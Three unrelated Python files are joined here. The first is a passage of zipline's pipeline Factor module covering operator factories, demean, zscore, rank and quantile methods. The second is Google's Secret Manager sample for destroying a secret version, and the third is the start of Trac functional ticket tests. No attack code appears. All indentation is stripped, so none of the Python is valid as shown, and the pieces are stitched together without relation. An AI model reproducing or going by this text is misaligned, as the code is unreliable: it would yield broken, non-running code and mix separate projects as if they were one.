def coerce_numbers_to_my_dtype(f):
"""
A decorator for methods whose signature is f(self, other) that coerces
``other`` to ``self.dtype``.
This is used to make comparison operations between numbers and `Factor`
instances work independently of whether the user supplies a float or
integer literal.
For example, if I write::
my_filter = my_factor > 3
my_factor probably has dtype float64, but 3 is an int, so we want to coerce
to float64 before doing the comparison.
"""
@wraps(f)
def method(self, other):
if isinstance(other, Number):
other = coerce_to_dtype(self.dtype, other)
return f(self, other)
return method
@curry
def set_attribute(name, value):
"""
Decorator factory for setting attributes on a function.
Doesn't change the behavior of the wrapped function.
Usage
-----
>>> @set_attribute('__name__', 'foo')
... def bar():
... return 3
...
>>> bar()
3
>>> bar.__name__
'foo'
"""
def decorator(f):
setattr(f, name, value)
return f
return decorator
# Decorators for setting the __name__ and __doc__ properties of a decorated
# function.
# Example:
with_name = set_attribute('__name__')
with_doc = set_attribute('__doc__')
def binop_return_type(op):
if is_comparison(op):
return NumExprFilter
else:
return NumExprFactor
def binop_return_dtype(op, left, right):
"""
Compute the expected return dtype for the given binary operator.
Parameters
----------
op : str
Operator symbol, (e.g. '+', '-', ...).
left : numpy.dtype
Dtype of left hand side.
right : numpy.dtype
Dtype of right hand side.
Returns
-------
outdtype : numpy.dtype
The dtype of the result of `left <op> right`.
"""
if is_comparison(op):
if left != right:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Comparisons are only supported between Factors of equal "
"dtypes.".format(left=left, op=op, right=right)
)
return bool_dtype
elif left != float64_dtype or right != float64_dtype:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Arithmetic operators are only supported between Factors of "
"dtype 'float64'.".format(
left=left.name,
op=op,
right=right.name,
)
)
return float64_dtype
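# Quick reference for the rules above (a comment sketch, not executed):
#   binop_return_dtype('>', float64, float64) -> bool_dtype (comparison)
#   binop_return_dtype('+', float64, float64) -> float64_dtype (arithmetic)
#   binop_return_dtype('>', float64, int64)   -> TypeError (mixed comparison dtypes)
#   binop_return_dtype('+', float64, int64)   -> TypeError (non-float64 operand)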
def binary_operator(op):
"""
Factory function for making binary operator methods on a Factor subclass.
Returns a function, "binary_operator" suitable for implementing functions
like __add__.
"""
# When combining a Factor with a NumericalExpression, we use this
# attrgetter instance to defer to the commuted implementation of the
# NumericalExpression operator.
commuted_method_getter = attrgetter(method_name_for_op(op, commute=True))
@with_doc("Binary Operator: '%s'" % op)
@with_name(method_name_for_op(op))
@coerce_numbers_to_my_dtype
def binary_operator(self, other):
# This can't be hoisted up a scope because the types returned by
# binop_return_type aren't defined when the top-level function is
# invoked in the class body of Factor.
return_type = binop_return_type(op)
if isinstance(self, NumExprFactor):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other,
)
return return_type(
"({left}) {op} ({right})".format(
left=self_expr,
op=op,
right=other_expr,
),
new_inputs,
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, NumExprFactor):
# NumericalExpression overrides ops to correctly handle merging of
# inputs. Look up and call the appropriate reflected operator with
# ourself as the input.
return commuted_method_getter(other)(self)
elif isinstance(other, Term):
if self is other:
return return_type(
"x_0 {op} x_0".format(op=op),
(self,),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
return return_type(
"x_0 {op} x_1".format(op=op),
(self, other),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, Number):
return return_type(
"x_0 {op} ({constant})".format(op=op, constant=other),
binds=(self,),
# .dtype access is safe here because coerce_numbers_to_my_dtype
# will convert any input numbers to numpy equivalents.
dtype=binop_return_dtype(op, self.dtype, other.dtype)
)
raise BadBinaryOperator(op, self, other)
return binary_operator
def reflected_binary_operator(op):
"""
Factory function for making binary operator methods on a Factor.
Returns a function, "reflected_binary_operator" suitable for implementing
functions like __radd__.
"""
assert not is_comparison(op)
@with_name(method_name_for_op(op, commute=True))
@coerce_numbers_to_my_dtype
def reflected_binary_operator(self, other):
if isinstance(self, NumericalExpression):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other
)
return NumExprFactor(
"({left}) {op} ({right})".format(
left=other_expr,
right=self_expr,
op=op,
),
new_inputs,
dtype=binop_return_dtype(op, other.dtype, self.dtype)
)
# Only have to handle the numeric case because in all other valid cases
# the corresponding left-binding method will be called.
elif isinstance(other, Number):
return NumExprFactor(
"{constant} {op} x_0".format(op=op, constant=other),
binds=(self,),
dtype=binop_return_dtype(op, other.dtype, self.dtype),
)
raise BadBinaryOperator(op, other, self)
return reflected_binary_operator
def unary_operator(op):
"""
Factory function for making unary operator methods for Factors.
"""
# Only negate is currently supported.
valid_ops = {'-'}
if op not in valid_ops:
raise ValueError("Invalid unary operator %s." % op)
@with_doc("Unary Operator: '%s'" % op)
@with_name(unary_op_name(op))
def unary_operator(self):
if self.dtype != float64_dtype:
raise TypeError(
"Can't apply unary operator {op!r} to instance of "
"{typename!r} with dtype {dtypename!r}.\n"
"{op!r} is only supported for Factors of dtype "
"'float64'.".format(
op=op,
typename=type(self).__name__,
dtypename=self.dtype.name,
)
)
# This can't be hoisted up a scope because the types returned by
# unary_op_return_type aren't defined when the top-level function is
# invoked.
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{op}({expr})".format(op=op, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{op}x_0".format(op=op),
(self,),
dtype=float64_dtype,
)
return unary_operator
def function_application(func):
"""
Factory function for producing function application methods for Factor
subclasses.
"""
if func not in NUMEXPR_MATH_FUNCS:
raise ValueError("Unsupported mathematical function '%s'" % func)
@with_name(func)
def mathfunc(self):
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{func}({expr})".format(func=func, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{func}(x_0)".format(func=func),
(self,),
dtype=float64_dtype,
)
return mathfunc
def restrict_to_dtype(dtype, message_template):
"""
A factory for decorators that restrict Factor methods to only be
callable on Factors with a specific dtype.
This is conceptually similar to
zipline.utils.input_validation.expect_dtypes, but provides more flexibility
for providing error messages that are specifically targeting Factor
methods.
Parameters
----------
dtype : numpy.dtype
The dtype on which the decorated method may be called.
message_template : str
A template for the error message to be raised.
`message_template.format` will be called with keyword arguments
`method_name`, `expected_dtype`, and `received_dtype`.
Usage
-----
@restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}."
"{method_name}() requires factors of dtype{expected_dtype}."
),
)
def some_factor_method(self, ...):
self.stuff_that_requires_being_float64(...)
"""
def processor(factor_method, _, factor_instance):
factor_dtype = factor_instance.dtype
if factor_dtype != dtype:
raise TypeError(
message_template.format(
method_name=factor_method.__name__,
expected_dtype=dtype.name,
received_dtype=factor_dtype,
)
)
return factor_instance
return preprocess(self=processor)
# Decorators for Factor methods.
if_not_float64_tell_caller_to_use_isnull = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}.\n"
"{method_name}() is only defined for dtype {expected_dtype}."
"To filter missing data, use isnull() or notnull()."
)
)
float64_only = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() is only defined on Factors of dtype {expected_dtype},"
" but it was called on a Factor of dtype {received_dtype}."
)
)
FACTOR_DTYPES = frozenset([datetime64ns_dtype, float64_dtype, int64_dtype])
class Factor(RestrictedDTypeMixin, ComputableTerm):
"""
Pipeline API expression producing a numerical or date-valued output.
Factors are the most commonly-used Pipeline term, representing the result
of any computation producing a numerical result.
Factors can be combined, both with other Factors and with scalar values,
via any of the builtin mathematical operators (``+``, ``-``, ``*``, etc).
This makes it easy to write complex expressions that combine multiple
Factors. For example, constructing a Factor that computes the average of
two other Factors is simply::
>>> f1 = SomeFactor(...)
>>> f2 = SomeOtherFactor(...)
>>> average = (f1 + f2) / 2.0
Factors can also be converted into :class:`zipline.pipeline.Filter` objects
via comparison operators: (``<``, ``<=``, ``!=``, ``eq``, ``>``, ``>=``).
There are many natural operators defined on Factors besides the basic
numerical operators. These include methods identifying missing or
extreme-valued outputs (isnull, notnull, isnan, notnan), methods for
normalizing outputs (rank, demean, zscore), and methods for constructing
Filters based on rank-order properties of results (top, bottom,
percentile_between).
"""
ALLOWED_DTYPES = FACTOR_DTYPES # Used by RestrictedDTypeMixin
# Dynamically add functions for creating NumExprFactor/NumExprFilter
# instances.
clsdict = locals()
clsdict.update(
{
method_name_for_op(op): binary_operator(op)
# Don't override __eq__ because it breaks comparisons on tuples of
# Factors.
for op in MATH_BINOPS.union(COMPARISONS - {'=='})
}
)
clsdict.update(
{
method_name_for_op(op, commute=True): reflected_binary_operator(op)
for op in MATH_BINOPS
}
)
clsdict.update(
{
unary_op_name(op): unary_operator(op)
for op in UNARY_OPS
}
)
clsdict.update(
{
funcname: function_application(funcname)
for funcname in NUMEXPR_MATH_FUNCS
}
)
__truediv__ = clsdict['__div__']
__rtruediv__ = clsdict['__rdiv__']
eq = binary_operator('==')
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def demean(self, mask=NotSpecified, groupby=NotSpecified):
"""
Construct a Factor that computes ``self`` and subtracts the mean from
each row of the result.
If ``mask`` is supplied, ignore values where ``mask`` returns False
when computing row means, and output NaN anywhere the mask is False.
If ``groupby`` is supplied, compute by partitioning each row based on
the values produced by ``groupby``, de-meaning the partitioned arrays,
and stitching the sub-results back together.
Parameters
----------
mask : zipline.pipeline.Filter, optional
A Filter defining values to ignore when computing means.
groupby : zipline.pipeline.Classifier, optional
A classifier defining partitions over which to compute means.
Example
-------
Let ``f`` be a Factor which would produce the following output::
AAPL MSFT MCD BK
2017-03-13 1.0 2.0 3.0 4.0
2017-03-14 1.5 2.5 3.5 1.0
2017-03-15 2.0 3.0 4.0 1.5
2017-03-16 2.5 3.5 1.0 2.0
Let ``c`` be a Classifier producing the following output::
AAPL MSFT MCD BK
2017-03-13 1 1 2 2
2017-03-14 1 1 2 2
2017-03-15 1 1 2 2
2017-03-16 1 1 2 2
Let ``m`` be a Filter producing the following output::
AAPL MSFT MCD BK
2017-03-13 False True True True
2017-03-14 True False True True
2017-03-15 True True False True
2017-03-16 True True True False
Then ``f.demean()`` will subtract the mean from each row produced by
``f``.
::
AAPL MSFT MCD BK
2017-03-13 -1.500 -0.500 0.500 1.500
2017-03-14 -0.625 0.375 1.375 -1.125
2017-03-15 -0.625 0.375 1.375 -1.125
2017-03-16 0.250 1.250 -1.250 -0.250
``f.demean(mask=m)`` will subtract the mean from each row, but means
will be calculated ignoring values on the diagonal, and NaNs will be
written to the diagonal in the output. Diagonal values are ignored
because they are the locations where the mask ``m`` produced False.
::
AAPL MSFT MCD BK
2017-03-13 NaN -1.000 0.000 1.000
2017-03-14 -0.500 NaN 1.500 -1.000
2017-03-15 -0.166 0.833 NaN -0.666
2017-03-16 0.166 1.166 -1.333 NaN
``f.demean(groupby=c)`` will subtract the group-mean of AAPL/MSFT and
MCD/BK from their respective entries. The AAPL/MSFT are grouped
together because both assets always produce 1 in the output of the
classifier ``c``. Similarly, MCD/BK are grouped together because they
always produce 2.
::
AAPL MSFT MCD BK
2017-03-13 -0.500 0.500 -0.500 0.500
2017-03-14 -0.500 0.500 1.250 -1.250
2017-03-15 -0.500 0.500 1.250 -1.250
2017-03-16 -0.500 0.500 -0.500 0.500
``f.demean(mask=m, groupby=c)`` will also subtract the group-mean of
AAPL/MSFT and MCD/BK, but means will be calculated ignoring values on
the diagonal, and NaNs will be written to the diagonal in the output.
::
AAPL MSFT MCD BK
2017-03-13 NaN 0.000 -0.500 0.500
2017-03-14 0.000 NaN 1.250 -1.250
2017-03-15 -0.500 0.500 NaN 0.000
2017-03-16 -0.500 0.500 0.000 NaN
Notes
-----
Mean is sensitive to the magnitudes of outliers. When working with
a factor that can potentially produce large outliers, it is often useful
to use the ``mask`` parameter to discard values at the extremes of the
distribution::
>>> base = MyFactor(...)
>>> normalized = base.demean(mask=base.percentile_between(1, 99))
``demean()`` is only supported on Factors of dtype float64.
See Also
--------
:meth:`pandas.DataFrame.groupby`
"""
# This is a named function so that it has a __name__ for use in the
# graph repr of GroupedRowTransform.
def demean(row):
return row - nanmean(row)
return GroupedRowTransform(
transform=demean,
factor=self,
mask=mask,
groupby=groupby,
)
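# Doctest-style illustration of the row transform defined above; it matches
# the first row (2017-03-13) of the worked example in the docstring:
#   >>> import numpy as np
#   >>> row = np.array([1.0, 2.0, 3.0, 4.0])
#   >>> row - np.nanmean(row)
#   array([-1.5, -0.5,  0.5,  1.5])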
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def zscore(self, mask=NotSpecified, groupby=NotSpecified):
"""
Construct a Factor that Z-Scores each day's results.
The Z-Score of a row is defined as::
(row - row.mean()) / row.stddev()
If ``mask`` is supplied, ignore values where ``mask`` returns False
when computing row means and standard deviations, and output NaN
anywhere the mask is False.
If ``groupby`` is supplied, compute by partitioning each row based on
the values produced by ``groupby``, z-scoring the partitioned arrays,
and stitching the sub-results back together.
Parameters
----------
mask : zipline.pipeline.Filter, optional
A Filter defining values to ignore when Z-Scoring.
groupby : zipline.pipeline.Classifier, optional
A classifier defining partitions over which to compute Z-Scores.
Returns
-------
zscored : zipline.pipeline.Factor
A Factor that z-scores the output of ``self``.
Notes
-----
Mean and standard deviation are sensitive to the magnitudes of
outliers. When working with a factor that can potentially produce large
outliers, it is often useful to use the ``mask`` parameter to discard
values at the extremes of the distribution::
>>> base = MyFactor(...)
>>> normalized = base.zscore(mask=base.percentile_between(1, 99))
``zscore()`` is only supported on Factors of dtype float64.
Example
-------
See :meth:`~zipline.pipeline.factors.Factor.demean` for an in-depth
example of the semantics for ``mask`` and ``groupby``.
See Also
--------
:meth:`pandas.DataFrame.groupby`
"""
# This is a named function so that it has a __name__ for use in the
# graph repr of GroupedRowTransform.
def zscore(row):
return (row - nanmean(row)) / nanstd(row)
return GroupedRowTransform(
transform=zscore,
factor=self,
mask=mask,
groupby=groupby,
)
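# Doctest-style illustration of the row transform defined above, assuming
# nanstd matches numpy's population default (ddof=0):
#   >>> import numpy as np
#   >>> row = np.array([1.0, 2.0, 3.0, 4.0])
#   >>> (row - np.nanmean(row)) / np.nanstd(row)
#   array([-1.34164079, -0.4472136 ,  0.4472136 ,  1.34164079])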
def rank(self, method='ordinal', ascending=True, mask=NotSpecified):
"""
Construct a new Factor representing the sorted rank of each column
within each row.
Parameters
----------
method : str, {'ordinal', 'min', 'max', 'dense', 'average'}
The method used to assign ranks to tied elements. See
`scipy.stats.rankdata` for a full description of the semantics for
each ranking method. Default is 'ordinal'.
ascending : bool, optional
Whether to return sorted rank in ascending or descending order.
Default is True.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, ranks are computed ignoring any asset/date
pairs for which `mask` produces a value of False.
Returns
-------
ranks : zipline.pipeline.factors.Rank
A new factor that will compute the ranking of the data produced by
`self`.
Notes
-----
The default value for `method` is different from the default for
`scipy.stats.rankdata`. See that function's documentation for a full
description of the valid inputs to `method`.
Missing or non-existent data on a given day will cause an asset to be
given a rank of NaN for that day.
See Also
--------
:func:`scipy.stats.rankdata`
:class:`zipline.pipeline.factors.factor.Rank`
"""
return Rank(self, method=method, ascending=ascending, mask=mask)
@expect_types(bins=int, mask=(Filter, NotSpecifiedType))
def quantiles(self, bins, mask=NotSpecified):
"""
Construct a Classifier computing quantiles of the output of ``self``.
Every non-NaN data point in the output is labelled with an integer value
from 0 to (bins - 1). NaNs are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
bins : int
Number of bin labels to compute.
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quantiles.
Returns
-------
quantiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to (bins - 1).
"""
if mask is NotSpecified:
mask = self.mask
return Quantiles(inputs=(self,), bins=bins, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quartiles(self, mask=NotSpecified):
"""
Construct a Classifier computing quartiles over the output of ``self``.
Every non-NaN data point in the output is labelled with a value of either
0, 1, 2, or 3, corresponding to the first, second, third, or fourth
quartile over each row. NaN data points are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quartiles.
Returns
-------
quartiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 3.
"""
return self.quantiles(bins=4, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quintiles(self, mask=NotSpecified):
"""
Construct a Classifier computing quintile labels on ``self``.
Every non-NaN data point in the output is labelled with a value of
0, 1, 2, 3, or 4, corresponding to quintiles over each row. NaN data
points are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quintiles.
Returns
-------
quintiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 4.
"""
return self.quantiles(bins=5, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def deciles(self, mask=NotSpecified):
"""
Construct a Classifier computing decile labels on ``self``.
Every non-NaN data point in the output is labelled with a value from 0 to
9, corresponding to deciles over each row. NaN data points are labelled
with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing deciles.
Returns
-------
deciles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 9.
"""
return self.quantiles(bins=10, mask=mask)
def top(self, N, mask=NotSpecified):
"""
Construct a Filter matching the top N asset values of self each day.
Parameters
----------
N : int
Number of assets passing the returned filter each day.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, top values are computed ignoring any
asset/date pairs for which `mask` produces a value of False.
Returns
-------
filter : zipline.pipeline.filters.Filter
"""
return self.rank(ascending=False, mask=mask) <= N
def bottom(self, N, mask=NotSpecified):
"""
Construct a Filter matching the bottom N asset values of self each day.
Parameters
----------
N : int
Number of assets passing the returned filter each day.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, bottom values are computed ignoring any
asset/date pairs for which `mask` produces a value of False.
Returns
-------
filter : zipline.pipeline.Filter
"""
return self.rank(ascending=True, mask=mask) <= N
def percentile_between(self,
min_percentile,
max_percentile,
mask=NotSpecified):
"""
Construct a new Filter representing entries from the output of this
Factor that fall within the percentile range defined by min_percentile
and max_percentile.
Parameters
----------
min_percentile : float [0.0, 100.0]
Return True for assets falling above this percentile in the data.
max_percentile : float [0.0, 100.0]
Return True for assets falling below this percentile in the data.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when calculating
percentile thresholds. If mask is supplied, percentile cutoffs
are computed each day using only assets for which ``mask`` returns
True. Assets for which ``mask`` produces False will produce False
in the output of this Factor as well.
Returns
-------
out : zipline.pipeline.filters.PercentileFilter
A new filter that will compute the specified percentile-range mask.
See Also
--------
zipline.pipeline.filters.filter.PercentileFilter
"""
return PercentileFilter(
self,
min_percentile=min_percentile,
max_percentile=max_percentile,
mask=mask,
)
def isnull(self):
"""
A Filter producing True for values where this Factor has missing data.
Equivalent to self.isnan() when ``self.dtype`` is float64.
Otherwise equivalent to ``self.eq(self.missing_value)``.
Returns
-------
filter : zipline.pipeline.filters.Filter
"""
if self.dtype == float64_dtype:
# Using isnan is more efficient when possible because we can fold
# the isnan computation with other NumExpr expressions.
return self.isnan()
else:
return NullFilter(self)
def notnull(self):
"""
A Filter producing True for values where this Factor has complete data.
Equivalent to ``~self.isnan()`` when ``self.dtype`` is float64.
Otherwise equivalent to ``(self != self.missing_value)``.
"""
return ~self.isnull()
@if_not_float64_tell_caller_to_use_isnull
def isnan(self):
"""
A Filter producing True for all values where this Factor is NaN.
Returns
-------
nanfilter : zipline.pipeline.filters.Filter
"""
return self != self
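# NaN is the only floating-point value that compares unequal to itself, so
# ``self != self`` is True exactly where the output is NaN; compare
# ``float('nan') != float('nan')`` evaluating to True in plain Python.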
@if_not_float64_tell_caller_to_use_isnull
def notnan(self):
"""
A Filter producing True for values where this Factor is not NaN.
Returns
-------
nanfilter : zipline.pipeline.filters.Filter
"""
return ~self.isnan()
@if_not_float64_tell_caller_to_use_isnull
def isfinite(self):
"""
A Filter producing True for values where this Factor is anything but
NaN, inf, or -inf.
"""
return (-inf < self) & (self < inf)
class NumExprFactor(NumericalExpression, Factor):
"""
Factor computed from a numexpr expression.
Parameters
----------
expr : string
A string suitable for passing to numexpr. All variables in 'expr'
should be of the form "x_i", where i is the index of the corresponding
factor input in 'binds'.
binds : tuple
A tuple of factors to use as inputs.
Notes
-----
NumExprFactors are constructed by numerical operators like `+` and `-`.
Users should rarely need to construct a NumExprFactor directly.
"""
pass
class GroupedRowTransform(Factor):
"""
A Factor that transforms an input factor by applying a row-wise
shape-preserving transformation on classifier-defined groups of that
Factor.
This is most often useful for normalization operators like ``zscore`` or
``demean``.
Parameters
----------
transform : function[ndarray[ndim=1] -> ndarray[ndim=1]]
Function to apply over each row group.
factor : zipline.pipeline.Factor
The factor providing baseline data to transform.
mask : zipline.pipeline.Filter
Mask of entries to ignore when calculating transforms.
groupby : zipline.pipeline.Classifier
Classifier partitioning ``factor`` into groups to use when calculating
the transform.
Notes
-----
Users should rarely construct instances of this factor directly. Instead,
they should construct instances via factor normalization methods like
``zscore`` and ``demean``.
See Also
--------
zipline.pipeline.factors.Factor.zscore
zipline.pipeline.factors.Factor.demean
"""
window_length = 0
def __new__(cls, transform, factor, mask, groupby):
if mask is NotSpecified:
mask = factor.mask
else:
mask = mask & factor.mask
if groupby is NotSpecified:
groupby = Everything(mask=mask)
return super(GroupedRowTransform, cls).__new__(
GroupedRowTransform,
transform=transform,
inputs=(factor, groupby),
missing_value=factor.missing_value,
mask=mask,
dtype=factor.dtype,
)
def _init(self, transform, *args, **kwargs):
self._transform = transform
return super(GroupedRowTransform, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, transform, *args, **kwargs):
return (
super(GroupedRowTransform, cls).static_identity(*args, **kwargs),
transform,
)
def _compute(self, arrays, dates, assets, mask):
data = arrays[0]
null_group_value = self.inputs[1].missing_value
group_labels = where(
mask,
arrays[1],
null_group_value,
)
return where(
group_labels != null_group_value,
naive_grouped_rowwise_apply(
data=data,
group_labels=group_labels,
func=self._transform,
),
self.missing_value,
)
@property
def transform_name(self):
return self._transform.__name__
def short_repr(self):
return type(self).__name__ + '(%r)' % self.transform_name
class Rank(SingleInputMixin, Factor):
"""
A Factor representing the row-wise rank data of another Factor.
Parameters
----------
factor : zipline.pipeline.factors.Factor
The factor on which to compute ranks.
method : str, {'average', 'min', 'max', 'dense', 'ordinal'}
The method used to assign ranks to tied elements. See
`scipy.stats.rankdata` for a full description of the semantics for each
ranking method.
See Also
--------
:func:`scipy.stats.rankdata`
:class:`Factor.rank`
Notes
-----
Most users should call Factor.rank rather than directly construct an
instance of this class.
"""
window_length = 0
dtype = float64_dtype
def __new__(cls, factor, method, ascending, mask):
return super(Rank, cls).__new__(
cls,
inputs=(factor,),
method=method,
ascending=ascending,
mask=mask,
)
def _init(self, method, ascending, *args, **kwargs):
self._method = method
self._ascending = ascending
return super(Rank, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, method, ascending, *args, **kwargs):
return (
super(Rank, cls).static_identity(*args, **kwargs),
method,
ascending,
)
def _validate(self):
"""
Verify that the stored rank method is valid.
"""
if self._method not in _RANK_METHODS:
raise UnknownRankMethod(
method=self._method,
choices=set(_RANK_METHODS),
)
return super(Rank, self)._validate()
def _compute(self, arrays, dates, assets, mask):
"""
For each row in the input, compute a like-shaped array of per-row
ranks.
"""
return masked_rankdata_2d(
arrays[0],
mask,
self.inputs[0].missing_value,
self._method,
self._ascending,
)
def __repr__(self):
return "{type}({input_}, method='{method}', mask={mask})".format(
type=type(self).__name__,
input_=self.inputs[0],
method=self._method,
mask=self.mask,
)
class CustomFactor(PositiveWindowLengthMixin, CustomTermMixin, Factor):
'''
Base class for user-defined Factors.
Parameters
----------
inputs : iterable, optional
An iterable of `BoundColumn` instances (e.g. USEquityPricing.close),
describing the data to load and pass to `self.compute`. If this
argument is passed to the CustomFactor constructor, we look for a
class-level attribute named `inputs`.
window_length : int, optional
Number of rows to pass for each input. If this argument is not passed
to the CustomFactor constructor, we look for a class-level attribute
named `window_length`.
mask : zipline.pipeline.Filter, optional
A Filter describing the assets on which we should compute each day.
Each call to ``CustomFactor.compute`` will only receive assets for
which ``mask`` produced True on the day for which compute is being
called.
Notes
-----
Users implementing their own Factors should subclass CustomFactor and
implement a method named `compute` with the following signature:
.. code-block:: python
def compute(self, today, assets, out, *inputs):
...
On each simulation date, ``compute`` will be called with the current date,
an array of sids, an output array, and an input array for each expression
passed as inputs to the CustomFactor constructor.
The specific types of the values passed to `compute` are as follows::
today : np.datetime64[ns]
Row label for the last row of all arrays passed as `inputs`.
assets : np.array[int64, ndim=1]
Column labels for `out` and `inputs`.
out : np.array[self.dtype, ndim=1]
Output array of the same shape as `assets`. `compute` should write
its desired return values into `out`.
*inputs : tuple of np.array
Raw data arrays corresponding to the values of `self.inputs`.
``compute`` functions should expect to be passed NaN values for dates on
which no data was available for an asset. This may include dates on which
an asset did not yet exist.
For example, if a CustomFactor requires 10 rows of close price data, and
asset A started trading on Monday June 2nd, 2014, then on Tuesday, June
3rd, 2014, the column of input data for asset A will have 9 leading NaNs
for the preceding days on which data was not yet available.
Examples
--------
A CustomFactor with pre-declared defaults:
.. code-block:: python
class TenDayRange(CustomFactor):
"""
Computes the difference between the highest high in the last 10
days and the lowest low.
Pre-declares high and low as default inputs and `window_length` as
10.
"""
inputs = [USEquityPricing.high, USEquityPricing.low]
window_length = 10
def compute(self, today, assets, out, highs, lows):
from numpy import nanmin, nanmax
highest_highs = nanmax(highs, axis=0)
lowest_lows = nanmin(lows, axis=0)
out[:] = highest_highs - lowest_lows
# Doesn't require passing inputs or window_length because they're
# pre-declared as defaults for the TenDayRange class.
ten_day_range = TenDayRange()
A CustomFactor without defaults:
.. code-block:: python
class MedianValue(CustomFactor):
"""
Computes the median value of an arbitrary single input over an
arbitrary window.
Does not declare any defaults, so values for `window_length` and
`inputs` must be passed explicitly on every construction.
"""
def compute(self, today, assets, out, data):
from numpy import nanmedian
out[:] = nanmedian(data, axis=0)
# Values for `inputs` and `window_length` must be passed explicitly to
# MedianValue.
median_close10 = MedianValue([USEquityPricing.close], window_length=10)
median_low15 = MedianValue([USEquityPricing.low], window_length=15)
'''
dtype = float64_dtype
class Latest(LatestMixin, CustomFactor):
"""
Factor producing the most recently-known value of `inputs[0]` on each day.
The `.latest` attribute of DataSet columns returns an instance of this
Factor.
"""
window_length = 1
def compute(self, today, assets, out, data):
out[:] = data[-1]
|
#!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command line application and sample code for destroying a secret version.
"""
import argparse
# [START secretmanager_destroy_secret_version]
def destroy_secret_version(project_id, secret_id, version_id):
"""
Destroy the given secret version, making the payload irrecoverable. Other
secret versions are unaffected.
"""
# Import the Secret Manager client library.
from google.cloud import secretmanager_v1beta1 as secretmanager
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret version.
name = client.secret_version_path(project_id, secret_id, version_id)
# Destroy the secret version.
response = client.destroy_secret_version(name)
print('Destroyed secret version: {}'.format(response.name))
# [END secretmanager_destroy_secret_version]
return response
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('project_id', help='id of the GCP project')
parser.add_argument('secret_id', help='id of the secret from which to act')
parser.add_argument('version_id', help='id of the version to destroy')
args = parser.parse_args()
destroy_secret_version(args.project_id, args.secret_id, args.version_id)
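# Example invocation (project/secret/version ids are hypothetical):
#
#     python destroy_secret_version.py my-project my-secret 1
#
# The resource name built above has the form
# projects/<project>/secrets/<secret>/versions/<version>.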
|
#!/usr/bin/python
import os
import re
from datetime import datetime, timedelta
from trac.tests.functional import *
from trac.util.datefmt import utc, localtz, format_date
class TestTickets(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Create a ticket, comment on it, and attach a file"""
# TODO: this should be split into multiple tests
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.create_ticket()
self._tester.add_comment(ticketid)
self._tester.attach_file_to_ticket(ticketid)
class TestTicketPreview(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Preview ticket creation"""
self._tester.go_to_front()
tc.follow('New Ticket')
summary = random_sentence(5)
desc = random_sentence(5)
tc.formvalue('propertyform', 'field-summary', summary)
tc.formvalue('propertyform', 'field-description', desc)
tc.submit('preview')
tc.url(self._tester.url + '/newticket$')
tc.find('ticket not yet created')
tc.find(summary)
tc.find(desc)
class TestTicketNoSummary(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Creating a ticket without summary should fail"""
self._tester.go_to_front()
tc.follow('New Ticket')
desc = random_sentence(5)
tc.formvalue('propertyform', 'field-description', desc)
tc.submit('submit')
tc.find(desc)
tc.find('Tickets must contain a summary.')
tc.find('Create New Ticket')
